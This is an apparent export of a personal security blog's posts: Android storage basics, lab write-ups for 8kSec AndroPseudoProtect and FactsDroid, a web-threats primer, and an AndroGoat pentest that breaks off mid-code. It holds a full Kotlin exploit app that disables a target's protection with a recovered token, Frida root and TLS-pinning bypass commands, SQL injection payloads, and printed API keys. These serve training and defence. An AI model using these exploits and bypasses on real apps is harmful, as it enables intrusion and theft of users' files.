[{"content":"","date":"15 April 2026","permalink":"/njeri/","section":"","summary":"","title":""},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/android-security/","section":"Tags","summary":"","title":"Android Security"},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/infosec/","section":"Tags","summary":"","title":"Infosec"},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/insecure-storage/","section":"Tags","summary":"","title":"Insecure Storage"},{"content":"Insecure Storage in Android # Insecure storage is still one of the easiest ways to recover sensitive data from an Android app during a pentest. Even when an app has strong network protections, it may still expose tokens, cached responses, credentials, or personal data locally. This post is a quick guide to the main Android storage locations and what they mean from a security testing perspective.\nShared Preferences # A key-value XML file that stores user preferences such as dark mode or light mode. They are also often used to store access tokens or other kinds of secrets. In itself, that is not an issue, but it makes shared preferences a very interesting target for stealing or overwriting internal files.\nDatabases # Many apps use SQLite3 to store more complex data structures in internal storage.\nCreated by the method openOrCreateDatabase(). In practice, this is where a pentester might find cached API responses, tokens, user profile data, or even plaintext credentials if the app stores them carelessly.\nCache Files # Used to store temporary files, and it gets cleaned automatically by the system when storage runs low. It can be accessed using getCacheDir(), which resolves to the application\u0026rsquo;s internal folder. 
From a pentesting perspective, cache files are worth checking because developers sometimes leave sensitive data there temporarily, such as downloaded documents, images, tokens, or session artifacts, assuming the system will remove them later.\nInternal Storage # The private directory of an app, located at /data/data/\u0026lt;package-name\u0026gt;. It is exclusive to the application and not shared with other apps, and /data/data is accessible only on rooted devices.\nExternal Storage # This used to be the SD card but now lives in internal flash storage. Permissions are much more limited nowadays, and it contains shared data such as photos and downloads. It is mounted at /storage/emulated/0, with /sdcard as a symlink to it. In the past, external storage was considered insecure because every app could access all the data on it. It was also easy to physically remove the SD card and steal its contents. Android 10 introduced scoped storage, which restricts applications to their own app-specific directory on external storage, for example /sdcard/Android/data/owasp.sat.agoat/, which other apps cannot access even if they have the READ_EXTERNAL_STORAGE permission.\nScoped storage bypass: Apps can still request the MANAGE_EXTERNAL_STORAGE permission (introduced in Android 11) to gain access to all files on external storage. Google Play has extremely strict policies on this. Unless your app is a file manager, antivirus, or backup tool, Google will likely reject it.\nAndroid Keystore # Stores cryptographic keys, typically with hardware-backed protection. It does not store passwords, only keys.\nFiles Directory # This directory is created when an application stores files in internal storage using the openFileOutput() method; you can locate those files via getFilesDir().\nSummary # Android applications utilize several distinct methods for storing data, each offering varying levels of privacy and security. 
Internal storage options like Shared Preferences and SQLite databases house private app details, while the Files and Cache directories manage temporary or structured content. While external storage was historically vulnerable to unauthorized access, modern versions of the operating system now implement scoped storage to isolate application data.\nFor highly sensitive information, the Android Keystore provides a specialized environment that secures cryptographic keys through hardware-based protection. Ultimately, understanding these diverse storage locations is essential for protecting user secrets and maintaining system integrity on mobile devices.\n","date":"15 April 2026","permalink":"/njeri/posts/android_storage/","section":"Posts","summary":"Insecure Storage in Android # Insecure storage is still one of the easiest ways to recover sensitive data from an Android app during a pentest. Even when an app has strong network protections, it may still expose tokens, cached responses, credentials, or personal data locally. This post is a quick guide to the main Android storage locations and what they mean from a security testing perspective.\nShared Preferences # A key-value XML file that stores user preferences such as dark mode or light mode. They are also often used to store access tokens or other kinds of secrets. 
In itself, that is not an issue, but it makes shared preferences a very interesting target for stealing or overwriting internal files.","title":"Insecure Storage in Android"},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/mobile-pentesting/","section":"Tags","summary":"","title":"Mobile Pentesting"},{"content":"","date":"15 April 2026","permalink":"/njeri/posts/","section":"Posts","summary":"","title":"Posts"},{"content":"","date":"15 April 2026","permalink":"/njeri/tags/","section":"Tags","summary":"","title":"Tags"},{"content":"8ksec - AndroPseudoProtect: Ultimate Device Security # Exploiting Exported Components and Bypassing Security By Obscurity Mechanisms # The goal of this exercise was to develop an Android application that exploits Android\u0026rsquo;s IPC by disabling AndroPseudoProtect.apk\u0026rsquo;s security functionality.\nMy initial thought process was that this would likely involve exploiting improperly exposed components. Specifically, if sensitive components are configured with exported=true, an attacker application could potentially access internal functionality via Inter-Process Communication (IPC), manipulate behavior, and bypass security controls. This assumption proved to be correct.\nInstalling and Running the App # Upon launching the app, it asks for access to all files.\nStatic Analysis with Jadx Findings # 1. Sensitive app components set to exported=true # After decompiling the APK with Jadx and looking at the AndroidManifest.xml file, I noted that both the SecurityService and SecurityReceiver were set to exported=true.\nThis is a critical misconfiguration. When an Android component is configured as exported=true, it becomes accessible to other applications on the device. In the AndroPseudoProtect application, the functionality to secure the files is controlled via explicit intents sent to the SecurityService. 
This makes it possible for an attacker to start and stop the security service by creating a malicious application that targets these components directly.\n2. Security Through Obscurity # After manual analysis of the SecurityService file, I noted that there is a call to SecurityUtils().getSecurityToken(). This method retrieves a security token from a native library. The token is then validated whenever startSecurity() or stopSecurity() is invoked. The design assumption appears to be that storing the token in native code prevents attackers from accessing it.\nThe token is used by the app to validate whether a caller is authorized to start or stop the security service. An attacker can reverse engineer the native library code to obtain the token, which would enable them to call functions to start and stop the SecurityService from their malicious application.\nExtracting the token: To validate this assumption, I proceeded with the following steps:\nDecompiled the APK using apktool. Navigated to the lib/ directory and located the native .so file. Reverse engineered the library using Ghidra. Identified the getSecurityToken() function. Extracted the hardcoded token: 8ksec_S3cr3tT0k3n_D0N0tSh4r3. I also observed that the native library generates a log message each time the user clicks the Start Service or Stop Service buttons. These buttons internally invoke the startSecurity() and stopSecurity() functions. From the code analysis, it is clear that both functions require the security token to be passed as part of the request. The logs captured from the Android emulator confirm that the token is validated whenever these methods are executed. This behavior further verifies that the application relies on the hardcoded native token to authorize starting and stopping the security service.\n3. 
Listening to broadcasts to know when to disable security # Further analysis revealed that the application sends a broadcast whenever the security service is started, and another whenever it is stopped. This means that any third-party application installed on the device can register a BroadcastReceiver and listen for the ACTION_SECURITY_STARTED event whenever the user enables security through the AndroPseudoProtect app.\nThe malicious app can then use the token we obtained above to call stopSecurity. From the user’s perspective, security appears to be enabled; however, in reality, it has already been disabled in the background by the malicious application. This demonstrates how unprotected broadcast mechanisms can be abused to monitor application state changes and trigger automated exploitation logic without requiring any direct user interaction.\nData Exfiltration from External Storage # For AndroPseudoProtect to work properly, it is granted the READ_EXTERNAL_STORAGE, MANAGE_EXTERNAL_STORAGE, and WRITE_EXTERNAL_STORAGE permissions so that the app can encrypt files located in external storage.\nAfter the malicious app disables the encryption enforced by the AndroPseudoProtect app, the attacker can use adb to grant the malicious app permission to read from external storage:\nadb shell pm grant com.example.myapplication android.permission.READ_EXTERNAL_STORAGE\nand then exfiltrate all the files and data stored there.\nExploit Development # To demonstrate the exploit, I developed a secondary Android application that:\nListens for ACTION_SECURITY_STARTED. Crafts an explicit intent targeting SecurityService and SecurityReceiver. Includes the security token recovered from the .so file. Invokes startService() to stop the protection mechanism. Reads the unencrypted files from external storage and displays them in the malicious app. 
Because the target components were exported and lacked caller validation, the exploit application could interact with them as if it were the legitimate app itself. The result is a complete bypass of the application\u0026rsquo;s encryption protection using only Android’s IPC framework.\nMalicious App Implementation (MainActivity.kt) #

```kotlin
package com.example.myapplication

import android.content.BroadcastReceiver
import android.content.ComponentName
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import android.os.Bundle
import android.os.Environment
import android.util.Log
import android.widget.Toast
import androidx.activity.ComponentActivity
import androidx.activity.compose.setContent
import androidx.activity.enableEdgeToEdge
import androidx.compose.foundation.layout.Column
import androidx.compose.foundation.layout.fillMaxSize
import androidx.compose.foundation.layout.fillMaxWidth
import androidx.compose.foundation.layout.height
import androidx.compose.foundation.layout.padding
import androidx.compose.foundation.lazy.LazyColumn
import androidx.compose.foundation.lazy.items
import androidx.compose.material3.Button
import androidx.compose.material3.Scaffold
import androidx.compose.material3.Text
import androidx.compose.runtime.Composable
import androidx.compose.runtime.mutableStateListOf
import androidx.compose.ui.Modifier
import androidx.compose.ui.layout.ContentScale
import androidx.compose.ui.tooling.preview.Preview
import androidx.compose.ui.unit.dp
import coil.compose.AsyncImage
import com.example.myapplication.ui.theme.MyApplicationTheme
import java.io.File

class MainActivity : ComponentActivity() {

    companion object {
        const val TARGET_PACKAGE = "com.eightksec.andropseudoprotect"
        const val RECEIVER_CLASS = "com.eightksec.andropseudoprotect.SecurityReceiver"
        const val SERVICE_CLASS = "com.eightksec.andropseudoprotect.SecurityService"
        const val ACTION_SECURITY_STARTED = "com.eightksec.andropseudoprotect.ACTION_SECURITY_STARTED"
        const val ACTION_STOP_SECURITY = "com.eightksec.andropseudoprotect.STOP_SECURITY"
        const val EXTRA_TOKEN = "security_token"
        const val SECRET_TOKEN = "8ksec_S3cr3tT0k3n_D0N0tSh4r3"
    }

    private val fileList = mutableStateListOf<String>()

    // Fires whenever the victim app announces that security was started,
    // so we can immediately turn it back off.
    private val securityStartedReceiver = object : BroadcastReceiver() {
        override fun onReceive(context: Context?, intent: Intent?) {
            if (intent?.action == ACTION_SECURITY_STARTED) {
                sendStopSecurityBroadcast()
            }
        }
    }

    // Explicit intent aimed at the exported component, carrying the token
    // recovered from the native library.
    private fun createSecurityIntent(className: String) = Intent(ACTION_STOP_SECURITY).apply {
        component = ComponentName(TARGET_PACKAGE, className)
        putExtra(EXTRA_TOKEN, SECRET_TOKEN)
    }

    private fun sendStopSecurityBroadcast() {
        sendBroadcast(createSecurityIntent(RECEIVER_CLASS))
    }

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        // Bug fix: the original listing never registered the receiver, so the
        // ACTION_SECURITY_STARTED hook could not fire and onDestroy's
        // unregisterReceiver always threw. (On API 33+ pass
        // Context.RECEIVER_EXPORTED as a third argument.)
        registerReceiver(securityStartedReceiver, IntentFilter(ACTION_SECURITY_STARTED))
        enableEdgeToEdge()
        setContent {
            MyApplicationTheme {
                Scaffold(modifier = Modifier.fillMaxSize()) { innerPadding ->
                    Greeting(
                        name = "Android",
                        files = fileList,
                        modifier = Modifier.padding(innerPadding),
                        onStopSecurityClick = { stopSecurity() },
                        onReadFilesClick = { readDownloadDirectory() }
                    )
                }
            }
        }
    }

    private fun readDownloadDirectory() {
        fileList.clear()
        val downloadFolder = Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_DOWNLOADS)
        val files = downloadFolder.listFiles()
        if (files != null && files.isNotEmpty()) {
            files.forEach { file -> fileList.add(file.absolutePath) }
        } else {
            Toast.makeText(this, "Download folder is empty or inaccessible", Toast.LENGTH_SHORT).show()
        }
    }

    private fun stopSecurity() {
        try {
            startService(createSecurityIntent(SERVICE_CLASS))
            sendStopSecurityBroadcast()
            Toast.makeText(this, "Stopping Security Service", Toast.LENGTH_SHORT).show()
        } catch (e: Exception) {
            Toast.makeText(this, "Error: ${e.message}", Toast.LENGTH_LONG).show()
        }
    }

    override fun onDestroy() {
        super.onDestroy()
        try {
            unregisterReceiver(securityStartedReceiver)
        } catch (e: Exception) {
            Log.i("missing_register", "Receiver not registered")
        }
    }
}

@Composable
fun Greeting(
    name: String,
    files: List<String>,
    modifier: Modifier = Modifier,
    onStopSecurityClick: () -> Unit = {},
    onReadFilesClick: () -> Unit = {}
) {
    Column(modifier = modifier.padding(16.dp)) {
        Text(text = "Hello $name!")
        Button(onClick = onStopSecurityClick, modifier = Modifier.padding(top = 8.dp)) {
            Text("Stop Security")
        }
        Button(onClick = onReadFilesClick, modifier = Modifier.padding(top = 8.dp)) {
            Text("Read Files")
        }
        Text(text = "Files in /Download:", modifier = Modifier.padding(top = 16.dp))
        LazyColumn(modifier = Modifier.fillMaxSize()) {
            items(files) { filePath ->
                Column(modifier = Modifier.padding(vertical = 8.dp)) {
                    if (filePath.lowercase().endsWith(".jpg") || filePath.lowercase().endsWith(".png")) {
                        AsyncImage(
                            model = filePath,
                            contentDescription = "Image",
                            modifier = Modifier.fillMaxWidth().height(200.dp),
                            contentScale = ContentScale.Crop
                        )
                    }
                    Text(text = filePath.substringAfterLast("/"), modifier = Modifier.padding(top = 4.dp))
                }
            }
        }
    }
}

@Preview(showBackground = true)
@Composable
fun GreetingPreview() {
    MyApplicationTheme {
        Greeting("Android", emptyList())
    }
}
```

Resources # Here is the proof of exploit video: https://youtu.be/0gmX6fSeqak\nAnd here is the link to the exploit apk\nConclusion # This exercise highlights several important mobile security principles:\nWe should not set sensitive components of our application to exported=true: Any exported component expands your attack surface. 
If a component does not need to be accessed externally, it should not be exported. If it must be exported, it should be protected with strong custom permissions. Security by Obscurity doesn\u0026rsquo;t make your app secure: Moving sensitive values to a native library .so file does not prevent reverse engineering. Attackers can decompile, disassemble, and analyze native libraries to obtain the hidden app secrets easily using tools like Ghidra. ","date":"1 March 2026","permalink":"/njeri/posts/andropseudoprotect/","section":"Posts","summary":"8ksec - AndroPseudoProtect: Ultimate Device Security # Exploiting Exported Components and Bypassing Security By Obscurity Mechanisms # The goal of this exercise was to develop an android application that exploits Android\u0026rsquo;s IPC by disabling AndroPseudoProtect.apk\u0026rsquo;s security functionality.\nMy initial thought process was that this would likely involve exploiting improperly exposed components. Specifically, if sensitive components are configured with exported=true, an attacker application could potentially access internal functionality via Inter-Process Communication (IPC), manipulate behavior, and bypass security controls. This assumption proved to be correct.\nInstalling and Running the App # Upon launching the app, the application asks for access to all files.","title":"8ksec - AndroPseudoProtect: Ultimate Device Security"},{"content":"","date":"1 March 2026","permalink":"/njeri/tags/mobile-exploits/","section":"Tags","summary":"","title":"Mobile Exploits"},{"content":"","date":"1 March 2026","permalink":"/njeri/tags/mobile-security/","section":"Tags","summary":"","title":"Mobile Security"},{"content":"GOAL: Intercept network traffic in FactsDroid and view/modify the API requests and responses between FactsDroid and the backend server without statically patching the provided APK. 
The objective is to successfully implement a Man-in-The-Middle (MITM) attack that allows you to manipulate the facts being displayed to the user, potentially inserting custom content or modifying the retrieved facts before they reach the application.\nUpon installing the app using adb install factsdroid.apk, I immediately see this error message when launching the app: In order to bypass the root check, I injected the Frida anti-root script into the app\u0026rsquo;s process at launch:\nfrida -U --codeshare dzonerzy/fridantiroot -f com.eightksec.factsdroid\nI was able to successfully bypass the root check:\nI had earlier added Burp\u0026rsquo;s CA certificate into my emulator and set up Burp to intercept all the network calls coming from my app by following this tutorial.\nSSL # SSL/TLS sits on top of TCP, just below the application protocol, and ensures that the traffic transmitted between the client and the server is encrypted. When an API request is made, the client and server perform an SSL/TLS handshake to establish a secure channel.\nSSL Pinning, on the other hand, is an extra layer of security implemented directly in the app\u0026rsquo;s code to stop Man-in-the-Middle (MITM) attacks. Usually, an app trusts any certificate signed by a valid root Certificate Authority (CA) found in the device\u0026rsquo;s trust store. However, with SSL pinning, instead of relying on the trust store, the app is hardcoded with a specific pin, typically a hash of the server’s public key or certificate.\nDuring the TLS handshake, the app compares the server\u0026rsquo;s certificate (or its public key) against this hardcoded pin. If they don\u0026rsquo;t match exactly, the app kills the connection immediately, even if the certificate is technically valid or signed by a trusted authority. 
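Conceptually, the pin check boils down to hashing the server's public key and comparing it with a value baked into the app. Below is a minimal JVM-only sketch — the function names are mine, not FactsDroid's, and real Android apps usually delegate this to OkHttp's CertificatePinner or the Network Security Config:

```kotlin
import java.security.MessageDigest
import java.util.Base64

// Compute an OkHttp-style "sha256/<base64>" pin from the DER-encoded
// SubjectPublicKeyInfo bytes of the server's certificate.
fun spkiPin(spkiDer: ByteArray): String {
    val digest = MessageDigest.getInstance("SHA-256").digest(spkiDer)
    return "sha256/" + Base64.getEncoder().encodeToString(digest)
}

// During the handshake the app recomputes the pin for the presented
// certificate and aborts the connection on any mismatch -- even when the
// chain is signed by a CA the device trusts.
fun pinMatches(spkiDer: ByteArray, expectedPin: String): Boolean =
    spkiPin(spkiDer) == expectedPin
```

Burp's CA certificate carries a different public key, so its pin never matches the hardcoded one, which is why interception fails until the check itself is disabled at runtime.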
This prevents a pentester from using a certificate issued by an attacker-controlled CA, such as Burp Suite\u0026rsquo;s, to intercept and read the traffic, which is why we see the error below upon clicking the Random Fact button.\nTherefore, I used Frida to bypass the TLS certificate validation using the following command (since this is a Flutter app, it needs the Flutter-specific TLS bypass script):\nfrida -U --codeshare dzonerzy/fridantiroot --codeshare TheDauntless/disable-flutter-tls-v1 -f com.eightksec.factsdroid\nAfter bypassing SSL pinning, I can now see the facts being rendered on the UI:\nEnsure that Support Invisible Proxying is enabled under Proxy settings -\u0026gt; Request handling. After enabling this, I was able to intercept and modify the response to change the fact rendered on the UI.\n","date":"4 February 2026","permalink":"/njeri/posts/factsdroid/","section":"Posts","summary":"GOAL: Intercept network traffic in FactsDroid and view/modify the API requests and responses between FactsDroid and the backend server without statically patching the provided APK. 
The objective is to successfully implement a Man-in-The-Middle (MITM) attack that allows you to manipulate the facts being displayed to the user, potentially inserting custom content or modifying the retrieved facts before they reach the application.\nUpon installing the app using adb install factsdroid.apk, I immediately see this error message when launching the app: In order to bypass the root check, I injected the Frida anti-root script into the app\u0026rsquo;s process:\nfrida -U --codeshare dzonerzy/fridantiroot -f com.","title":"8kSec - Factsdroid WriteUp"},{"content":"","date":"4 February 2026","permalink":"/njeri/tags/mitm-mobile-exploits/","section":"Tags","summary":"","title":"MITM - Mobile Exploits"},{"content":"","date":"4 February 2026","permalink":"/njeri/tags/pentesting/","section":"Tags","summary":"","title":"Pentesting"},{"content":"","date":"4 February 2026","permalink":"/njeri/tags/reverse-engineering/","section":"Tags","summary":"","title":"Reverse Engineering"},{"content":"3 Critical Database Security Threats # For software engineers, it may be easy to assume that no hacker would target our app since it isn’t big or well known. This attitude can lead to recklessness and weaker measures for securing an app’s data. However, it’s important to remember that security begins at the design phase. Database security is about protecting the \u0026ldquo;CIA Triad\u0026rdquo;: Confidentiality, Integrity, and Availability.\nIn this blog post, you’ll learn about the core database threats that jeopardize the CIA triad principles. By the end of the post, you’ll have learned about the following topics:\nSQL Injection (SQLi) Cross-Site Scripting (XSS) Cross-Site Request Forgery (CSRF) 1. SQL Injection (SQLi) # Happens when the database executes user data as code, i.e. when untrusted user input is used in an SQL query without sanitization. 
This alters database queries, leading to consequences such as data loss and data exfiltration by malicious attackers.\nTypes of SQL Injection\nBasic Boolean Logic: Using conditions that are always true, like ' OR '1'='1, or commenting out parts of the SQL query (like the password check) with the -- comment syntax to bypass authentication.\nUnion-based: Combines results from different tables using the UNION operator to steal data from another table.\nBlind SQL: Used when the application doesn\u0026rsquo;t return direct error messages; attackers instead rely on server response patterns or timing.\nBoolean-based attacks rely on binary answers from the database, observed through the response body or headers. Time-based attacks rely on time delays, i.e. how long the database takes to respond (e.g. if user = \u0026ldquo;Admin\u0026rdquo;, wait 5 seconds). Error-based: Causing the database to produce error messages that reveal the database type or table names. Countermeasures # Prepared Statements\nThe most effective way to prevent SQL injection is the use of prepared statements, also known as parameterized queries.\nWhy it is secure: The database treats the bind variables strictly as data, not code. Even if an attacker inputs SQL commands like ' OR '1'='1, the database reads it merely as a literal string, searching for a user named ' OR '1'='1.\nInput Sanitization\nValidating input ensures the data meets expected formats before it is processed and can be done using:\nAllow listing – only accepting a well-defined set of safe values. Block listing – filtering out specific characters known to be dangerous, such as apostrophes ', semicolons ;, or comment sequences --. 2. Cross-Site Scripting (XSS) # XSS targets the user\u0026rsquo;s browser. 
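Before moving on, the SQL injection countermeasure above is worth seeing concretely: compare the query text the database receives with and without bind variables. This is a runnable sketch — unsafeQuery is a deliberately vulnerable illustration I wrote for this post, and a real fix would use java.sql.PreparedStatement with ? placeholders:

```kotlin
// Deliberately vulnerable: user input is concatenated into the SQL text,
// so the input can rewrite the query itself.
fun unsafeQuery(name: String): String =
    "SELECT * FROM users WHERE name = '" + name + "'"

fun main() {
    val payload = "' OR '1'='1"
    // The payload escapes the string literal and rewrites the WHERE clause:
    println(unsafeQuery(payload))
    // -> SELECT * FROM users WHERE name = '' OR '1'='1'
    //
    // With a prepared statement the query text never changes:
    //   val stmt = conn.prepareStatement("SELECT * FROM users WHERE name = ?")
    //   stmt.setString(1, payload)  // bound strictly as data, never as SQL
    // The database then searches for a user literally named ' OR '1'='1.
}
```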
XSS happens when an application takes untrusted input and sends it back to the browser without proper encoding, so that the input is treated as HTML/JavaScript and executed in the context of the victim’s session.\nHow the compromise happens\nAn attacker injects a malicious script (the XSS payload) into a page the victim will load. When the victim’s browser renders that page, the script runs with the victim’s cookies, tokens, and permissions.\nXSS Types\nReflected XSS: The attacker tricks a user into clicking a malicious link that contains the script payload in a query parameter or form field. The server takes that value and “reflects” it back in the response without sanitizing it, so the script executes as soon as the victim loads the response.\nStored / Persistent XSS: The malicious script is saved on the server side (for example, as a blog comment, profile field or chat message). Every user who later views that page automatically runs the script in their browser—no special link is required for those subsequent victims.\n3. Cross-Site Request Forgery (CSRF) # CSRF happens when an attacker forces an authenticated user to send unwanted requests to a web application where they are currently logged in. This is dangerous because browsers automatically attach your cookies and session IDs to every request, so the app thinks the forged request is coming from you.\nA CSRF attack happens this way:\nThe Session: You are logged into a site (like your bank portal) in Tab A. The website has stored a cookie and session ID in your browser so you can perform multiple actions—like checking a balance and then downloading a statement—without re‑authenticating for every click. The Trap: In Tab B, you visit a malicious site or click a maliciously crafted link. This page contains a hidden request such as a form that submits automatically or a link to https://bank.com/transfer?amount=10000\u0026amp;to=attacker. 
The Hijack: Because your browser sees a request going to your bank, it automatically sends your valid session cookie. The bank\u0026rsquo;s server sees your valid cookie, assumes the request originated from you, and processes the transfer. Countermeasures # Protecting against CSRF requires more than just relying on the browser\u0026rsquo;s default behavior:\nAnti-CSRF Tokens: The server generates a unique, unpredictable nonce (a random string) that must be included in every state‑changing request, like a POST request to initiate a transfer of funds. Because of the Same‑Origin Policy (SOP), an attacker on a different website cannot read this token, making it very hard to forge a valid request. HTTP Referer / Origin Validation: The server checks the Referer or Origin header to ensure the request really started from your app (e.g. https://bank.com) and not from a third‑party malicious site. Double Submit Cookies: The server sends both a session cookie and a separate anti‑CSRF cookie. The client must submit the anti‑CSRF value (e.g. in a hidden form field) along with the request. The server verifies that the submitted value matches the cookie value before processing the action. Key Terms (for beginners) # CIA Triad – Security model that focuses on protecting data Confidentiality (no unauthorized reading), Integrity (no unauthorized changes), and Availability (systems stay up and usable). Database – A structured place where your application stores data (for example, users, orders, or transactions). SQL (Structured Query Language) – The language used to talk to relational databases (e.g. SELECT, INSERT, UPDATE). Query – A request you send to the database, such as “give me all users with this email”. SQL Injection – A vulnerability where untrusted user input is treated as part of the SQL query, letting an attacker change what the query does. Prepared / Parameterized Statement – A safe way to build SQL queries where placeholders (like ? 
or :id) are used and user input is bound as data instead of being concatenated into the query string. Input Sanitization / Validation – Checking and cleaning user input to make sure it matches an expected pattern (for example, an email, an integer, or a limited set of values). Cookie – A small piece of data stored in the browser and sent automatically with requests to a website, often used to keep you logged in. Session ID – A unique identifier stored in a cookie that tells the server which logged‑in user you are. XSS (Cross‑Site Scripting) – A vulnerability where untrusted input is rendered as HTML/JavaScript and executed in the victim’s browser. CSRF (Cross‑Site Request Forgery) – An attack where a malicious site tricks your browser into sending a request to a site where you are already logged in. Same‑Origin Policy (SOP) – Browser rule that only allows scripts to read responses from the same origin (same scheme, host, and port). This helps prevent one site from reading another site’s data. Nonce – A random value that is used once (number‑used‑once) to make requests unique and harder to forge. ","date":"3 February 2026","permalink":"/njeri/posts/database_security/","section":"Posts","summary":"3 Critical Database Command Injection Security Threats # For software engineers, it may be easy to assume that no hacker would target our app since it isn’t big or well known. This attitude can lead to recklessness and lower measures for securing data on an app. However, it’s important to remember that security begins at the design phase. Database security is about protecting the \u0026ldquo;CIA Triad\u0026rdquo;: Confidentiality, Integrity, and Availability.\nIn this blog post, you’ll learn about the core database threats that jeopardize the CIA triad principles. 
By the end of the post, you’ll have learned about the following topics:","title":"3 Critical Database Security Threats You Need to Know"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/android/","section":"Tags","summary":"","title":"android"},{"content":"","date":"3 February 2026","permalink":"/njeri/categories/android/","section":"Categories","summary":"","title":"android"},{"content":"Android Pentesting # To sharpen my skills, I recently took a deep dive into AndroGoat—a deliberately insecure Android application designed to showcase the most common OWASP Mobile Top 10 vulnerabilities.\nIn this post, I’ll walk through how I combined both static and dynamic analysis to uncover hardcoded secrets, bypass security checks with Frida, and extract sensitive data from local storage.\nMy pentesting toolkit included:\nJadx-GUI: For decompiling and reading Java/Kotlin source code.\nThe Android Debug Bridge (adb): The \u0026ldquo;command line\u0026rdquo; for interacting with the emulator in Android Studio.\nFrida: For dynamic instrumentation. Instrumentation is the art of injecting new functionality into the application at runtime, e.g. adding logs or bypassing certain conditional checks (such as checking whether the device running the app is an emulator).\nMobSF \u0026amp; APKLeaks: For automated static analysis of the APK.\nBurp Suite: To intercept network traffic.\nReconnaissance with MobSF # I started my recon by first uploading the AndroGoat APK to MobSF. This gave me a high-level overview of the attack surface before I started manual testing. Through MobSF, I was able to verify several high-risk findings:\nHardcoded Secrets including AWS Credentials and an OpenAI Key: Found in the resource strings and app logic.\nSensitive information is being logged\nSQL Injection\nDebug Mode: The android:debuggable flag is set to true.\nWeak Cryptographic Algorithm: the weak MD5 algorithm is used to hash PINs and passwords.\n1. 
Hardcoded Secrets (High) # I found multiple static credentials in the APK. Because APKs are just ZIPs, anyone can unzip or decompile and steal these keys; obfuscation does not protect them. The exposed OpenAI and AWS keys could be abused for data access and cloud spend.\nHow I uncovered them\nManual static review in Jadx: Searched for strings like \u0026ldquo;key\u0026rdquo; and \u0026ldquo;secret\u0026rdquo; and saw the OpenAI key that automated tools missed. Automation with apkleaks: Flagged the same OpenAI key and the AWS secret: abcdef1234567890abcdef1234567890abcdef12 (OpenAI API key) OviCwsFNWeoCSDKl3ZoD8j4BPnc1kCsfV+lOABCw (AWS Secret Access Key) Cross-check in MobSF: Its Secrets report listed the same tokens in resources/config, confirming they are truly embedded: The following secrets were identified from the app. Ensure that these are not secrets or private information. -abcdef1234567890abcdef1234567890abcdef12 258EAFA5-E914-47DA-95CA-C5AB0DC85B11 sha256/5gsjyidrmWjcLRClfCk+Dd6O0nx1CyFrVUW5wVkwEx0= OviCwsFNWeoCSDKl3ZoD8j4BPnc1kCsfV+lOABCw sha256/mEflZT5enoR1FuXLgYYGqnVEoZvmf9c2bVBpiOjYQ0c= How to Reproduce\nDecompile with Jadx; search for apiKey, secret, Bearer, AWS across code and resources. Run apkleaks -f androgoat.apk to enumerate obvious tokens. Upload the APK to MobSF and open the Secrets section to verify what’s embedded. Fix\nDo not ship secrets in the APK. Fetch them at runtime from a backend over TLS and gate with authentication/authorization. Rotate the exposed OpenAI and AWS keys immediately; assume compromise. Add automated secret-scanning tools like gitleaks or trufflehog to CI before signing and shipping the APK, to detect any secrets left in the codebase. 2.
Root and Emulator Detection # Root detection # A rooted device has a modified system that allows the user and apps to execute commands as the root user via the su binary.\nWhy apps care: Banking and security apps block rooted devices because if a device is rooted, the fundamental security sandbox is compromised. Malware with root access could theoretically read the banking app\u0026rsquo;s memory or keys.\nRoot detection is commonly done by checking whether the device running the application exposes the su binary (or related root artifacts) at well-known paths, e.g.:\nString[] file = {\u0026#34;/system/app/Superuser/Superuser.apk\u0026#34;, \u0026#34;/system/app/Superuser.apk\u0026#34;, \u0026#34;/sbin/su\u0026#34;, \u0026#34;/system/bin/su\u0026#34;, \u0026#34;/system/xbin/su\u0026#34;, \u0026#34;/data/local/xbin/su\u0026#34;, \u0026#34;/data/local/bin/su\u0026#34;, \u0026#34;/system/sd/xbin/su\u0026#34;, \u0026#34;/system/bin/failsafe/su\u0026#34;, \u0026#34;/data/local/su\u0026#34;, \u0026#34;/su/bin/su\u0026#34;, \u0026#34;re.robv.android.xposed.installer-1.apk\u0026#34;, \u0026#34;/data/app/eu.chainfire.supersu-1/base.apk\u0026#34;}; boolean result = false; for (String files : file) { File f = new File(files); result = f.exists(); if (result) { break; } } Despite this check, I was still able to bypass it on a rooted Android emulator (one that ships with Google APIs rather than the Google Play Store).\nGoogle APIs emulator images allow adb‑root and writable partitions but do not include a su binary.
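The path-based logic above can be extracted into a standalone Java sketch (paths copied from the app; the RootCheck class name is mine, not the app's). On a Google APIs emulator image, and typically on a stock Linux box, none of these paths exist, so the check reports not rooted even in a privileged environment:

```java
import java.io.File;

// Standalone sketch of the app's su-path root check.
public class RootCheck {
    static final String[] SU_PATHS = {
        "/system/app/Superuser.apk", "/sbin/su", "/system/bin/su",
        "/system/xbin/su", "/data/local/xbin/su", "/data/local/bin/su",
        "/system/sd/xbin/su", "/system/bin/failsafe/su", "/data/local/su",
        "/su/bin/su"
    };

    // Returns true only if a su binary sits at one of the hardcoded paths.
    static boolean suBinaryPresent() {
        for (String path : SU_PATHS) {
            if (new File(path).exists()) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        System.out.println(suBinaryPresent());
    }
}
```

Because the check is a simple file-existence loop, any environment (or hook) that hides these paths defeats it entirely.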
Any root‑detection logic that relies solely on checking for su will incorrectly conclude that the device is not rooted, even though the environment is privileged; the check will always return false.\nThis is why you also need to add an emulator check.\nEmulator Detection # The app grabs almost every identifying string from the Android OS, mashes them into one long string variable called buildDetails, and then checks it for words associated with emulators, e.g., generic, sdk, genymotion, x86, emulator.\nBypassing this with Frida:\nInject code that always returns false when the isEmulator function is called.\nJava.perform(function () { // 1. Target the specific Activity class var EmulatorDetection = Java.use(\u0026#34;owasp.sat.agoat.EmulatorDetectionActivity\u0026#34;); // 2. Overwrite the isEmulator function EmulatorDetection.isEmulator.implementation = function () { // 3. Force return false return false; }; }); I was able to successfully bypass this check:\nprivate final boolean isEmulator() { String buildDetails = (Build.FINGERPRINT + Build.DEVICE + Build.MODEL + Build.BRAND + Build.PRODUCT + Build.MANUFACTURER + Build.HARDWARE).toLowerCase(); Intrinsics.checkNotNullExpressionValue(buildDetails, \u0026#34;this as java.lang.String).toLowerCase()\u0026#34;); return StringsKt.contains$default((CharSequence) buildDetails, (CharSequence) \u0026#34;generic\u0026#34;, false, 2, 